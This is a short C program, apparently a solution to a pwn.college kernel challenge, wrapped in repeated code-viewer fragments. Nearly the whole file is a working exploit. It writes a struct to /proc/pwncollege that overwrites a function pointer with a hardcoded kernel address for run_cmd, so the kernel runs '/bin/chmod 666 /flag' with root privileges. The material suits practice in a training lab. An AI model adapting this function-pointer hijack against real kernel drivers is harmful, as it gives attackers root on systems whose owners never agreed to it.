20 lines
560 B
C
20 lines
560 B
C
#include <stdlib.h>
|
|
#include <stdint.h>
|
|
#include <string.h>
|
|
#include <sys/ioctl.h>
|
|
#include <fcntl.h>
|
|
#include <unistd.h>
|
|
|
|
struct evil
|
|
{
|
|
char buffer[256];
|
|
int (*log_function)(const char *, ...);
|
|
} s;
|
|
|
|
int main() {
|
|
int fd = open("/proc/pwncollege", O_WRONLY);
|
|
strcpy(s.buffer, "/bin/chmod 666 /flag");
|
|
s.log_function = 0xffffffff81089b30ull; // run_cmd
|
|
// run_cmd doesn't use stdin nor stdout. It also doesn't use current working directory. Its CWD is /. The executable should use absolute path.
|
|
write(fd, &s, sizeof(struct evil) - 1);
|
|
} |